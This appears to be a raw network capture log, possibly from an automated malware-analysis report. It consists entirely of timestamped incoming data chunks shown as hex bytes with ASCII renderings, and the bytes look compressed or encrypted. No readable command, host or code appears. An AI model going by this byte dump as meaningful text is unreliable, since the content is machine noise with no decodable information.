                                                                                                                                                                                    2023-01-05 07:59:30 UTC16572INData Raw: a4 79 76 80 82 23 5a a4 b3 f1 65 8b ae e8 ae 6f bf e0 86 4f ff e3 e2 68 6d 86 af 6e 34 d8 ef 9c 9c 6f ec bc b7 79 b1 2d e3 54 9d fe 71 cf 8f 8c df 07 15 62 c4 52 4b 02 34 a4 c2 e9 00 55 43 a8 ba 78 39 35 a0 cb 9b 01 04 98 1e 56 f2 54 dc 72 6e 6a b4 a4 dd a0 2b 6f 35 1e ec 9e 89 47 8c ac 46 56 fe 44 1d 80 fe ad d9 4b 7c 83 5b 49 10 8f d3 78 d6 c5 13 24 d7 98 8b 93 9b 34 15 43 c8 65 d0 04 61 0f 08 b6 ed 27 a7 8f 23 cd c2 87 da d0 46 6a a1 b0 23 f9 da fc d0 e9 87 53 f6 b9 fb 50 30 ee e2 df 57 48 c2 1a e9 9d 7a 96 18 e2 dc a8 59 ff 93 c0 59 2c 4a ee 5b 69 d0 63 bc 83 4b 3a cb 41 04 65 40 c4 82 2e 07 ad dc b9 ff ae c8 b4 44 a8 17 03 ef 24 6a 42 80 6d 70 6c 07 7a a1 3b df dc a0 34 b9 1f 28 d8 00 f9 02 86 51 6c 0f 24 fb 3a 77 e7 3d 1e b5 e9 e2 c7 f2 a5 6a 69 30
                                                                                                                                                                                    Data Ascii: yv#ZeoOhmn4oy-TqbRK4UCx95VTrnj+o5GFVDK|[Ix$4Cea'#Fj#SP0WHzYY,J[icK:Ae@.D$jBmplz;4(Ql$:w=ji0
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16588INData Raw: 0c 70 a4 58 1c 89 6e 8c 77 8f bc 2b e1 41 69 81 48 77 c5 92 34 e8 04 89 3e be 68 ad c6 e1 9d ea a1 21 51 32 0d 21 9e 78 0f cb ca 57 37 28 af 30 e0 a4 dc 42 79 31 40 50 18 8b f2 38 67 cd 6b 44 2c a6 7c 78 3f 10 bf 6a 77 c9 89 07 8b cd 2b d8 83 ff fc 7f 87 07 a3 cd 7a b7 4f db 8d 87 94 0d e0 ee 2c 01 28 bd 50 16 88 60 d6 6e d7 62 6e e6 96 23 40 f6 1e d8 d9 9e 5a bd 31 a0 ba 7a 7f 4f a7 43 16 86 77 8b 26 88 c8 26 bd 21 27 77 33 80 d7 be 78 b0 60 02 d6 a0 0a f9 1e 50 e8 3b e3 cd 31 ae 6a 2b e0 da c6 ba 96 9f b0 e9 b4 6a 9f 67 54 ef a7 f0 8a 36 57 ed eb 8b ab 7d 26 74 4e 34 20 a4 ab e7 50 06 40 15 70 7e 8e e9 07 e6 c0 f6 bc c4 b8 c8 fe a7 be 6b 8c 28 ad dd 2a 3a 64 dd ad 98 22 a7 a3 97 68 e7 34 a1 47 6e f5 f0 09 9f df 08 33 da b1 95 cb 1c 29 b3 22 cb d3 59 2b
                                                                                                                                                                                    Data Ascii: pXnw+AiHw4>h!Q2!xW7(0By1@P8gkD,|x?jw+zO,(P`nbn#@Z1zOCw&&!'w3x`P;1j+jgT6W}&tN4 P@p~k(*:d"h4Gn3)"Y+
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16604INData Raw: 4a 4c 40 1e 7a d1 11 82 19 3d 34 4f 8e 9e a1 50 a1 7d 7c cf ea 4c 0c d2 e5 e4 07 6c af fa 37 1b 07 58 9b f4 7f 1c a5 f6 38 7f cf c0 a1 dc 64 75 a7 22 ec bf 36 83 21 48 c7 f8 8f f1 79 83 a4 f4 e4 91 67 b4 c7 66 aa 90 89 fe 6a fe 84 63 35 a3 fe f1 87 04 08 b9 1a 06 1f 83 60 e4 9d 68 ef 01 d3 01 c9 6d e4 7c ab af 52 bd 5d 5e 64 25 f6 90 b3 fd 37 b8 aa 0f 9a 07 33 39 ce 41 71 3e 38 68 d2 f3 a3 5c 10 ed 0a c8 52 ac 0f 58 a1 7b 0c c4 7f e3 b7 8f d8 6e 67 a6 fc 23 ca e4 73 68 97 d8 01 b2 84 c0 ca 53 58 0d 4f ee 6c 8a eb 6c 39 17 9c 87 74 f9 14 58 9e f0 3e 95 fd 89 d3 4d 89 64 1f 61 42 d9 7a 5d 2d 83 7d a5 80 88 57 3c 9e 27 43 08 74 7b 80 c2 a0 0a 4f c5 41 17 f3 51 50 fe 5b 0e af a3 3e d3 f4 dc 2f c0 dd 26 ae c4 f2 1d c4 d8 db 9f bb bb 39 97 f5 e9 1e 5d c7 b4 79
                                                                                                                                                                                    Data Ascii: JL@z=4OP}|Ll7X8du"6!Hygfjc5`hm|R]^d%739Aq>8h\RX{ng#shSXOll9tX>MdaBz]-}W<'Ct{OAQP[>/&9]y
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16620INData Raw: 9a 2a 6a 31 0a c1 8a 2b 9c 64 1a 1f 97 08 9c 20 20 94 30 2d c6 4f 71 fa 90 2c 6b a4 cb 5c d7 20 d3 99 65 e2 cd 02 1b f2 45 07 6a b7 b3 d9 72 8c c6 00 1a 62 5b 77 12 d3 99 0f d6 e4 d3 b1 5e aa a1 a4 ef cf a8 3d 6a dc d3 f4 f2 2c a3 1c ae 47 e4 c0 6d d1 5f 5e 47 16 01 2f 5c 29 05 b6 6c 01 71 95 49 64 13 82 fe 96 a9 dc b8 c1 d7 7b 3a c3 ac 66 e6 2e 93 21 03 d2 f0 bb 0d 55 0a a0 f3 63 54 11 c4 7f 18 35 b9 02 66 c6 98 0a d5 d0 d3 90 3c 93 e6 b7 d3 40 86 6f ac 1a a9 9d 04 32 47 85 ff 01 86 56 b2 5f f7 cb 88 0b ea 4e 28 de bb 39 91 ef 42 41 a4 0a b1 42 08 33 f3 eb d2 e6 3c 37 2b d8 38 cf b1 57 56 e6 ba fd 97 11 38 1e 39 b9 ab 6f 4c 04 a8 a3 7b 8d 0c 56 b1 c3 2f 99 1e d7 1b 25 11 46 9f b6 51 99 b5 92 dd 54 f2 84 56 1c e7 af b1 5e 87 5a 45 e1 13 bc 16 09 2c 6b bf
                                                                                                                                                                                    Data Ascii: *j1+d 0-Oq,k\ eEjrb[w^=j,Gm_^G/\)lqId{:f.!UcT5f<@o2GV_N(9BAB3<7+8WV89oL{V/%FQTV^ZE,k
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16636INData Raw: b0 01 9b 45 be d2 17 f5 49 45 c4 34 aa c7 6a 22 37 e6 ce b9 9e 67 8d 4f b9 7f 6e 7e a4 3b ed c3 59 77 71 3b 88 e5 16 6a 74 b1 d3 4e 50 9f 42 82 4e d3 e8 f5 2f b2 3f 22 f7 88 5e 9b 4a da 3b 27 7f 14 d1 9b 2b 36 f8 16 85 99 28 20 c9 32 53 03 f6 0d 97 53 91 12 2e 51 c2 89 bc bb ef 07 6c 13 10 0e a7 95 92 47 9a 71 0e 13 32 bc ab 76 61 b0 2e 85 a1 74 76 e5 56 80 a7 5b 17 19 cf f6 96 2d 88 f1 fa cf 93 7d 01 e6 76 79 a8 d4 bc e7 90 af f3 ee 4c 4d bc 3b f4 35 51 50 1d 66 36 94 ce bd 74 2d e6 36 93 4f 2d cf 7c a2 c5 c5 89 e8 ce 8f 42 e6 59 42 6b 54 02 4b 93 a7 5b 42 3f da 09 a7 7b 40 35 e6 99 04 0e 9b a4 72 79 fa 87 38 bb 61 6a 8d 3d 15 e2 75 ac 8c e3 87 04 81 9f d4 5b bb 9f f9 d4 2e 43 4f d8 ef d3 31 53 cd e2 3e 83 2c 44 49 15 7b 24 e9 04 04 5f 5f d7 6b 2f 95 ce
                                                                                                                                                                                    Data Ascii: EIE4j"7gOn~;Ywq;jtNPBN/?"^J;'+6( 2SS.QlGq2va.tvV[-}vyLM;5QPf6t-6O-|BYBkTK[B?{@5ry8aj=u[.CO1S>,DI{$__k/
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16652INData Raw: e8 e2 a8 61 d9 37 da ff ce 5d 9e 02 81 68 da c4 c4 fb 02 dd 6f 61 ea c1 a3 f0 fd de 0c 56 50 7c e5 1e 1c ce 35 cb be 16 8c d2 e7 5b e1 b9 79 fd d2 cf 29 42 42 64 1c b9 1c 93 24 df df 59 5a 2a f4 92 a7 42 6d 02 b9 8d ef 0c 32 57 b0 a3 fe 3b d6 66 b2 ef cc f9 28 9a 09 b7 3a 61 ee 6a a1 0f 74 3d 83 36 9e 6c e6 fc 26 f3 a3 8e 26 91 8b 2e d6 9c c8 2b d4 c8 1a 10 26 7d 9e 64 28 ac dd 48 68 bf 57 51 aa cb c3 2a d0 20 28 f2 40 64 77 13 a1 e1 2a 09 53 a0 9a 50 13 6a 01 b1 eb 32 d0 36 7f b6 5e 31 a1 5b 66 81 e4 e0 66 2d dc fb 45 89 24 47 b7 ea 9e bc 87 5d 2f 98 7b 36 80 4f 19 82 3d c8 d8 ba fe c3 b7 1f 43 7f 18 7a 36 9e 30 73 bc cb 58 30 f6 22 93 bc 7e 6d 4a b7 aa 27 03 5b c2 8b 84 00 7e 21 b4 06 90 ce 42 c0 f1 5a b3 b2 06 cc ce 7f 2b 8f 55 57 23 47 96 bd 41 b1 03
                                                                                                                                                                                    Data Ascii: a7]hoaVP|5[y)BBd$YZ*Bm2W;f(:ajt=6l&&.+&}d(HhWQ* (@dw*SPj26^1[ff-E$G]/{6O=Cz60sX0"~mJ'[~!BZ+UW#GA
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16668INData Raw: c8 d9 7a 6b b2 72 99 05 c2 83 f9 76 fd 2d d3 8c 34 55 30 92 6c 76 1b 1f 40 0a 36 19 86 c4 1d 86 22 12 c0 d5 96 f4 71 ec a5 db 93 86 88 2a 96 19 29 08 45 c1 3b b8 d8 56 5c bf 43 d3 cf 30 a7 e8 ef b1 b2 28 92 b7 8b 94 fd 1f 17 24 be 8c ba 4c 97 9c 2b f5 7e 91 ec b0 ef 5c 52 24 08 8e 05 21 bb b1 f7 c0 16 12 1b bf f4 7c bc 59 84 e0 54 77 a8 a2 36 c4 f9 9e cf c2 0f 46 24 80 b6 6c ad a0 91 6a 93 08 95 7c 92 a2 30 ce 3a e4 db 09 b7 09 80 81 bf cd c7 de b0 48 74 26 66 aa 9b ce 2e 0c 96 ba bf 26 9f 1f 37 bf 71 ce 63 25 a8 3b 7b 04 dc 7f 22 03 52 da c1 24 a5 79 ac e7 e7 ea 6d 11 99 78 cc 14 24 3e 77 23 29 75 0c 11 20 3d f5 46 22 af 74 69 61 e9 a3 46 7d 8f 2a fe e8 60 84 e3 7b c3 1b 77 9d 27 9c 8c e5 53 a9 95 9e 0b 74 23 56 93 cb a9 11 dd b4 6e 2c 17 90 f1 d0 06 b8
                                                                                                                                                                                    Data Ascii: zkrv-4U0lv@6"q*)E;V\C0($L+~\R$!|YTw6F$lj|0:Ht&f.&7qc%;{"R$ymx$>w#)u =F"tiaF}*`{w'St#Vn,
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16684INData Raw: 8f b8 2c 70 76 48 15 10 5f 84 92 8a 96 52 3d e1 e7 79 2c fa 66 98 5e da 03 45 c1 7b 51 75 83 f5 7d d7 57 7c c1 e0 ef 90 63 7a 4d 33 24 d6 75 b8 3c d1 54 cb 21 65 ab a8 eb 48 e5 87 ba a3 46 4f e3 79 4f 2c 91 f4 ad 51 eb 88 01 f4 e0 ac e7 2d 30 fc be ad 09 23 d5 3c 97 c3 96 e2 8b 18 a1 98 6e 83 14 dd 26 66 b4 a2 68 2f e2 1a a9 25 81 e0 b7 37 f5 0f 0a 4f 7b 55 8a bc 98 60 eb 49 42 db d6 64 b0 5d 65 03 1b 81 25 96 03 14 3e 5a d8 3e b7 c4 1d 6d dc d5 04 57 b0 fd 35 9a 5e 1d 23 5b b1 4b 31 55 67 f0 0f 4b c8 a3 7a 4c 83 fa f4 c5 53 7b 1f af df a7 0b 19 0a 8c a4 83 19 27 37 75 47 12 35 0b be 3a 4f 11 10 b6 6d af 86 83 40 cc b4 3e ca d4 93 21 e0 db d3 82 09 e2 bf 84 41 8a c4 fa c7 3f 4e 5a ea 46 b4 12 6e 21 dd 13 88 62 68 dd ab c5 57 30 ca 11 3b 35 77 6e 11 50 c6
                                                                                                                                                                                    Data Ascii: ,pvH_R=y,f^E{Qu}W|czM3$u<T!eHFOyO,Q-0#<n&fh/%7O{U`IBd]e%>Z>mW5^#[K1UgKzLS{'7uG5:Om@>!A?NZFn!bhW0;5wnP
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16700INData Raw: f0 88 a0 40 8e 36 18 9f 96 22 ec e6 95 f6 f6 31 c0 65 f6 26 90 b8 27 b5 b8 18 34 25 1e 4f b2 06 fd 9c 27 31 08 c8 da 57 30 a0 eb 52 3b 45 1e e2 8b f4 55 3d 1e 67 37 51 36 cf 24 7e f9 41 03 90 e3 ff 3e 40 4a 4f e5 0e 60 c5 7d 22 e1 f4 9a 5c f6 d7 8c db e4 88 73 46 49 0b be aa 60 8b b1 9c 30 0a 86 21 cd 99 45 61 8b ca 0d c9 f4 5e 1a 08 49 53 d7 8c 16 10 ea 42 9a 94 f2 ab c4 f1 47 01 dd ce 6b 74 60 4b cf 15 da 05 98 52 3e 8a cf aa 58 6f d4 9a ca 7f a1 c5 20 20 5a 99 b2 49 15 94 ea 00 b5 67 93 79 10 e8 95 cf 9d ad 51 d4 2a 28 72 41 43 8b 71 2b 52 24 34 d6 76 eb 08 dc 63 0c 03 39 58 40 c6 ee 6f ce 01 88 91 84 0f d5 88 b8 30 0d b8 2b eb 98 5f 71 91 37 a1 36 0b da a8 36 c4 18 fe fb 1e a2 18 7f fd 2e 9e 63 be bc f9 b2 85 41 69 a8 19 80 3c bf 36 77 9b b1 bd 1d 80
                                                                                                                                                                                    Data Ascii: @6"1e&'4%O'1W0R;EU=g7Q6$~A>@JO`}"\sFI`0!Ea^ISBGkt`KR>Xo ZIgyQ*(rACq+R$4vc9X@o0+_q766.cAi<6w
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16716INData Raw: 16 20 c1 a0 2d b7 50 4f 87 b0 6f f3 e1 c6 70 ff b9 28 34 14 29 da 4a c3 15 4c 64 38 17 fa aa ae c5 8e 2e 9b 30 66 d7 08 c9 4c 2b bf 9c 49 0e 3f 6b 31 07 60 13 ef 38 ff 2c c8 ea 14 56 fc e4 90 48 1f c3 39 b8 68 8d fb 53 af ce 0c 25 92 fa c7 8b 8a 2d 8f a1 b9 20 08 74 67 38 3f 53 b5 2b 21 f0 1c ac e5 8d 97 15 d9 64 52 b9 8e 51 4c 3a 62 d2 fb 6a 49 eb 0a 29 a1 79 d9 6e 67 bd bf b2 c1 e6 5b 8a 91 d9 5e 85 61 3a f2 00 32 cd 2d cf 68 42 f5 f2 1f 98 7b c1 1b b5 b5 04 c3 7e 15 89 0a ab b4 e2 ef 93 51 33 47 80 8c e6 ab cc af 05 08 60 1f 3b 85 2d d0 8c 6c 95 74 21 c9 45 79 c7 ee 70 17 6a aa 60 2d c2 e4 f3 09 2d 2f 5e f7 fd 6c 3e ae d1 f2 20 04 ad d6 6f 86 0e 52 cb 51 84 9e 21 0e 29 8f 2d 45 de f1 68 6f 3d c6 18 bd e7 3b 8b aa 63 4b 6d f1 61 4c 3f 39 d4 57 a7 5e 58
                                                                                                                                                                                    Data Ascii: -POop(4)JLd8.0fL+I?k1`8,VH9hS%- tg8?S+!dRQL:bjI)yng[^a:2-hB{~Q3G`;-lt!Eypj`--/^l> oRQ!)-Eho=;cKmaL?9W^X
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16732INData Raw: 38 a1 35 98 9d 72 47 41 06 c1 cd a1 35 f2 11 5f 78 0a d2 89 19 ec 4b be 17 d8 de 16 df 50 2e 35 65 b2 c7 ac 1c 07 a9 ee fa af 13 a3 a6 a6 ee 54 14 1d 38 b2 11 b1 a6 b9 ac 51 9a b4 90 17 ee 7a 3f 5b 4d 2a 91 1b e4 7c 93 4c 62 5d 1b 58 32 28 75 18 fb e9 e9 9f 2c b7 9a 84 01 a2 b1 97 e0 29 1e 19 6c 89 48 58 6a c8 3e eb ae ab 2e fb 77 13 b7 da c8 15 da 98 58 95 fe 3e 23 f6 67 8c 40 6e 19 74 24 7d 73 f5 4b cf f8 5b 13 42 92 21 46 a5 db 4e d3 ed 33 97 8d 14 02 bc cf 0c 23 30 50 8d 5a 87 6d c5 29 7f c2 50 0d 2a 75 a0 16 0a cf 99 c9 6c c0 e9 e5 10 07 29 dc 56 97 08 10 ec 90 81 33 a8 27 4c bf 30 ca 44 8b 9e 26 e8 47 d9 97 19 4a 3d ab ea ec c2 f8 7f a3 c6 c6 f3 ec 27 48 1a 51 5a 67 6a b8 0d bd a3 9c 31 76 81 14 cd 7c da ac 78 8d 56 d6 3e 3b 1e ef 6f de 0b b3 76 c0
                                                                                                                                                                                    Data Ascii: 85rGA5_xKP.5eT8Qz?[M*|Lb]X2(u,)lHXj>.wX>#g@nt$}sK[B!FN3#0PZm)P*ul)V3'L0D&GJ='HQZgj1v|xV>;ov
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16748INData Raw: d0 49 50 03 67 49 a7 60 7e 11 03 95 48 04 fd f2 c8 3e d8 a9 19 ad fd 8d c6 02 cf 25 e0 2c 9c 68 22 87 4e d8 8c ec f4 47 4c eb dd 86 b1 b6 14 65 9e 8f a7 b2 69 9c 5d d5 20 2c 61 63 40 de d3 c6 7f e9 80 d2 ab 8c 49 c8 5d 2f b2 b2 c9 14 48 11 43 73 14 0c bb ad fd bf 96 11 a2 c0 41 47 d3 94 aa 52 3a a7 c9 df 64 69 7f f5 d1 90 5e 82 eb 74 29 c7 84 f0 8b b6 b5 13 09 3d 06 f1 9c f7 1a bd 4b b4 00 cc 40 1f c8 5b 64 14 53 6c 98 bc ee 14 ed 72 3c 98 24 62 a9 ac fc dd 90 36 99 d4 dc 11 c7 a8 4f ee cb 93 85 48 da 2d 4c c5 9f 92 b2 c5 c2 d6 24 b1 62 8d 9c f3 2f 23 a1 69 ef 20 9e 9d 1f ac 1b 00 b3 86 52 49 c9 4e 92 e6 06 f5 85 c5 22 e9 8f 5a 86 ce 5f d3 15 47 31 2b e2 44 7e ab 33 d1 90 1d 3a 88 4e 4d ce 59 dd f3 66 5b 9c cd c6 9e ee 52 f2 b3 a3 4a bc 1d bc 9a 8e d6 de
                                                                                                                                                                                    Data Ascii: IPgI`~H>%,h"NGLei] ,ac@I]/HCsAGR:di^t)=K@[dSlr<$b6OH-L$b/#i RIN"Z_G1+D~3:NMYf[RJ
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16764INData Raw: 42 50 4d 8e cb 71 8b a5 b2 30 65 f7 c9 ae 84 f3 a1 0c 1a e6 b5 27 56 95 43 6b 5d 6c 74 e6 61 8f a3 2b f3 6d a5 ae d8 87 5d b1 23 79 94 59 ba 5a 7c 6d ac 6c 18 5f 4f 64 3d 61 c2 4b c1 5f 17 b4 88 aa b3 aa 12 2b 67 a9 9b 11 fd 4c b3 cc a9 91 8f b0 3e f3 7f 18 0e f6 54 b5 e7 47 e6 ef be 83 f9 2f 0b 38 98 02 c6 62 8c af 63 81 d1 6b 6e a6 f0 c5 51 10 88 b1 cc ad 08 b9 58 fb 5a 18 50 cf 41 92 b5 a3 03 dd 8a 3b 35 8a 56 ac f0 85 a7 6c 62 59 f1 7e 52 29 21 5e ef ff 58 8f 52 6a 8b b0 cd 74 75 25 f5 bd 13 13 7e 1b 12 86 75 9e 37 d3 30 f8 91 cb 6c 10 82 7f a2 11 3f 7a 1c 7a 9e 34 37 e4 63 c7 e5 f6 8c 2f 74 b1 b2 9a 69 d4 72 fa 3a 23 20 9c 99 4f b7 d3 95 af e7 af da 1f d7 9a ad f6 59 a5 02 90 cb a4 b7 c0 a8 a7 77 46 ea 69 43 84 c2 b6 f5 a7 f9 67 78 50 fd 17 d8 12 43
                                                                                                                                                                                    Data Ascii: BPMq0e'VCk]lta+m]#yYZ|ml_Od=aK_+gL>TG/8bcknQXZPA;5VlbY~R)!^XRjtu%~u70l?zz47c/tir:# OYwFiCgxPC
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16780INData Raw: fc cf d1 80 47 d4 53 2d c7 49 ba 8b ba 2d 41 5f 2f 3f 6a 93 cb f8 ac 26 2b 47 3c f3 a4 f7 74 fd 12 cb 96 6c 85 cc ee f3 5c 60 d1 c2 05 47 05 d8 b4 13 7b df 38 7f 0e 67 b9 05 f4 e7 da 6e d4 ad d4 09 9f 78 40 c5 b4 36 de f4 45 32 20 55 96 8d 31 38 ba 3b 4b eb f4 6d fe 11 38 32 b6 fc 56 84 52 96 18 ad e6 54 76 bb af 5f 31 fd 00 e4 0b 8e 8f b0 9b 3d 2c 74 53 a2 e6 95 93 e0 56 32 e7 e2 2f 12 91 1c 7e eb 4e fc b4 66 ec 55 36 36 66 5c 6b a5 fb 21 c2 7c 9e 99 12 79 27 c1 a1 60 5a 7a 30 41 f5 eb c0 60 7c bc 3d 5b ab 09 cb e9 61 2e da 27 c5 ca 65 dd b1 cc 02 92 7b cb d5 f4 79 a3 0c d9 c3 2c 74 21 c9 cd 6e 1d c4 4a c3 b6 7d 92 7b 6f 77 fe bc a2 0f 3a 98 a2 f8 3e e3 fa 20 f5 f9 86 4d 8d 73 40 4b 6d d9 d0 22 ae 51 9e a5 33 1b 40 9c 19 5d 2b 18 24 64 3a e9 10 bb a8 54
                                                                                                                                                                                    Data Ascii: GS-I-A_/?j&+G<tl\`G{8gnx@6E2 U18;Km82VRTv_1=,tSV2/~NfU66f\k!|y'`Zz0A`|=[a.'e{y,t!nJ}{ow:> Ms@Km"Q3@]+$d:T
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16796INData Raw: b2 2a d0 10 84 fc 76 0d 5c dc 9c 39 8d 9b a3 f9 93 33 6d 0d 5f ac 19 86 25 51 77 50 a6 5d 30 52 2e 58 98 53 f2 b7 a8 90 c1 91 78 e6 5e c3 41 22 fe 65 f9 6d 9e 79 6d 26 29 3b 4c 4a 7e 23 cf 53 77 8e c9 55 16 f6 a0 74 d3 fc 7c 08 b4 d5 a6 a8 a3 cf 82 08 f3 29 f5 ae 35 e5 d7 a8 21 88 ed dc 2c fb 59 7d 8f 34 b9 bf 3c 49 b8 a6 f2 72 38 71 92 1c 5e 74 a4 f8 bd fb df 74 e0 18 ce 0f 3e fd 55 cf 70 02 44 0e ae 39 af 72 ac e8 ab 00 6c f1 98 4f 84 bb 2b ea 96 f0 f3 93 82 65 19 7a 64 93 67 eb 13 78 48 ae 5d 7a f8 a3 14 e7 25 78 d8 4b 61 74 ed 6f e5 bd 90 85 0b 21 7b b6 f9 28 11 2f b2 37 c3 34 ff 4e 90 23 c1 0d b7 67 09 b5 27 dc 8f 76 03 7b a6 48 72 0e 2d 6f 05 73 c0 96 1b ed 35 2d 88 27 5b 01 9d e8 84 04 0e f9 0c 21 82 c3 02 ad 8f 66 51 36 b8 de 61 91 d8 1f ac 2e bf
                                                                                                                                                                                    Data Ascii: *v\93m_%QwP]0R.XSx^A"emym&);LJ~#SwUt|)5!,Y}4<Ir8q^tt>UpD9rlO+ezdgxH]z%xKato!{(/74N#g'v{Hr-os5-'[!fQ6a.
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16812INData Raw: 8d 47 a0 b2 e2 80 97 c9 d6 e5 a2 d4 bb 2c 3c ca be fb 5f 3d dd 9d be 0e a8 37 2f 12 fb f2 3d b5 73 86 fb a7 42 b5 af 11 f8 68 00 5e 07 73 37 9b 25 08 5e ff ee 6b 71 89 b4 93 43 1b 06 dd 9f 54 cd 62 90 74 f0 ce f2 cf 2c b9 f3 46 d0 7e 15 41 eb b3 8a 00 65 d7 60 0e 9c fc 27 d1 5a af c6 48 a5 86 a7 0f 02 3a cc ad 56 90 30 6c 20 bb b0 b1 45 be 14 e8 70 11 56 f7 98 87 ed 5d 86 9d 6c 1b 07 b8 ff 43 12 e8 c0 29 ac aa 2b ad 2d c1 50 7e e9 54 4c d4 5b c1 50 dd ee 26 8f 58 c6 ac 6b 4b 84 b3 3b ea 85 50 0b 99 7d a6 09 20 8c 48 6c f8 f7 20 e2 f6 3b 88 a3 18 f0 06 8b 09 f9 cb 5e 62 43 3e e8 22 82 7a 8a 9b 4c 1f b4 1c 1c 5b 16 68 1a a3 24 e7 ce da 33 b2 b3 b1 87 09 cf c1 17 62 b5 5b c1 0e 87 33 f3 1a 21 39 c1 ef 2b 29 4e 03 74 20 49 8f 3c 55 aa 96 71 89 67 28 52 ef 94
                                                                                                                                                                                    Data Ascii: G,<_=7/=sBh^s7%^kqCTbt,F~Ae`'ZH:V0l EpV]lC)+-P~TL[P&XkK;P} Hl ;^bC>"zL[h$3b[3!9+)Nt I<Uqg(R
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16828INData Raw: 13 bb 8a cd 58 1c d3 9f 1f d3 9f cb 78 9d 41 c7 85 ab 3b c7 51 1e 53 5d 9a b2 c1 79 05 d4 68 a3 a3 b3 aa 02 c2 74 b5 5f 5c 26 c1 e3 72 59 b3 38 14 5b 40 ad cb df 9e 08 15 5b d0 45 1c f9 c0 1d 12 6e ae f0 9e b4 64 e1 1b 03 69 7b fe d0 ca 6e db 8a 1f 81 8d 39 0f 08 76 f4 7b 76 a8 34 fe b1 69 45 d0 49 44 15 7b 90 5c d9 11 9c 55 74 37 e7 69 f3 0e 84 e0 1c 4c 9f aa d7 41 18 55 a2 7e b1 89 96 08 51 09 60 26 3d a8 55 92 8c 97 ff 42 94 4e 31 bd fb 3a be 10 e4 e1 56 35 92 1b 0d 25 7b a7 d1 e3 bb cf ee 0d 13 12 94 30 6a 5f 61 7d f7 70 67 6e ba 77 e9 13 97 ea 66 e1 88 bd 2a bd a4 2b 9a 35 3f 1b 16 dd 82 e7 f1 89 23 ef 96 fb ea 85 7e 5a 8d 94 e9 51 9e 7f 68 c9 29 b8 c8 03 88 3b d4 7b f2 af 75 15 fd a3 1e 82 5b e4 0b b1 15 01 94 e1 8a 47 60 89 24 46 dd 32 c7 e4 f7 20
                                                                                                                                                                                    Data Ascii: XxA;QS]yht_\&rY8[@[Endi{n9v{v4iEID{\Ut7iLAU~Q`&=UBN1:V5%{0j_a}pgnwf*+5?#~ZQh);{u[G`$F2
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16844INData Raw: d9 83 ba 23 ea 95 45 ed 6e 71 07 14 7c 62 1d 30 3e 81 ea 9a 8c db 6e 86 78 13 e7 95 d6 52 1a a4 da 99 5a f7 12 f4 ac 3b 27 0c 08 55 33 df 1a a7 f3 dc a7 71 f7 9d 21 09 cc 17 6f 68 7e ae 0a d6 1a 0a ba 5c b3 c3 25 a3 30 b3 b6 04 4b 01 bc de ff 20 24 02 52 b3 e9 c1 7c 54 cc f1 ce 11 c3 d7 6b 10 38 5a 76 ae fb de b2 8c ae 0a 5f 53 60 3c f4 cd c8 48 5e f7 04 ea c4 4b c0 ff 6d b3 7e a9 d2 db 77 92 7d 95 db c3 da c9 ec 70 d1 7b 91 51 41 0c d1 57 f5 24 50 e9 5b 0d 3a 1d 86 b2 ec 3d 20 0a 39 d2 1c 80 a7 5e ba 95 c5 af b6 b7 f3 99 fd 22 6c 35 19 eb c4 c1 42 27 9d ef 84 d9 20 0f e7 63 2b 7b 0c a4 7f e5 6c b4 8b 66 70 c8 79 6c 3d 7a 6a 18 f4 93 6b 0b 79 86 fc a7 a2 3d e3 39 8e 16 40 73 58 72 20 e9 31 41 5e 74 f2 c9 75 47 56 57 17 13 2c 41 be d5 8f 5f de 2b b3 6b 87
                                                                                                                                                                                    Data Ascii: #Enq|b0>nxRZ;'U3q!oh~\%0K $R|Tk8Zv_S`<H^Km~w}p{QAW$P[:= 9^"l5B' c+{lfpyl=zjky=9@sXr 1A^tuGVW,A_+k
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16860INData Raw: 17 dd f2 da 29 4d 4f fc c8 ff 80 a5 ab 37 7f ef e8 ac 8b fd 5a 69 1e e5 a6 65 3e 1e d8 c7 27 a2 86 f1 ad d7 c1 57 30 d5 ab 25 89 ae 04 0b c8 70 92 34 b6 37 24 f9 07 61 06 c5 02 85 8a 23 90 4f f9 ad 5a 4a cc 67 ca df d2 f4 bb cf 24 f6 bb 10 44 92 15 79 86 24 8a 96 8e 4a 22 28 47 f4 7e 6a 8d 19 09 ff b3 a5 13 e8 47 64 ca 98 eb 9d ee ab d6 1f ad dd d6 86 17 1c 9a 7c df fe be f9 43 6a 5b 93 d9 86 ad 2c a2 c8 3d fd a0 2f f8 6c 1b 21 43 ea 16 d2 0b 9c b2 b7 8f 0d 42 a3 6b 73 1c 4c 44 69 53 40 dd 79 9d e2 39 7a a4 31 1b c8 a3 fa f2 7c ce 22 f6 9a 25 3c 0e 88 0f 58 11 93 ba ee 3f 59 c3 45 7a 42 fb 2a f4 e1 58 5c 3d 91 77 f9 11 73 6e a6 9c 92 a4 6c 80 7f a8 af d5 85 74 eb 49 40 b5 00 7a d0 a1 39 e6 d7 a5 15 d0 de a3 97 cd 8b cd e6 06 84 bb 6c 82 1a 00 7a a6 f1 40
                                                                                                                                                                                    Data Ascii: )MO7Zie>'W0%p47$a#OZJg$Dy$J"(G~jGd|Cj[,=/l!CBksLDiS@y9z1|"%<X?YEzB*X\=wsnltI@z9lz@
